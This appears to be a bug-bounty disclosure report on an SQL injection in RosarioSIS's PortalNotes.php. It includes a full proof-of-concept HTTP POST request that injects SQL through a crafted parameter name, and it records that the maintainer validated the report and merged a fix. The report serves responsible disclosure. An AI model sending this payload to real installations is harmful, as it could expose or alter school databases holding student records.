SQL injection in PortalNotes in francoisjacquet/rosariosis

Valid

Reported on

Apr 23rd 2022


Description

In PortalNotes.php, web server get values parameter as a part of sql query without sanitize, so attacker can be manipulated sql query, which is executed by web server.

Proof of Concept

POST /rosariosis/Modules.php?value=123 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/rosariosis/Modules.php?modname=School_Setup/PortalNotes.php
Cookie: RosarioSIS=usti6etu55tb38dsu6iq78c1u5
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

modname=School_Setup/PortalNotes.php&modfunc=update&values[1' or 1][id]=123

PoC image

image

Impact

An attacker can modify the query and get all the data in the database.

We are processing your report and will contact the francoisjacquet/rosariosis team within 24 hours. a month ago
François Jacquet validated this vulnerability a month ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
François Jacquet confirmed that a fix has been merged on a06112 a month ago
François Jacquet has been awarded the fix bounty
to join this conversation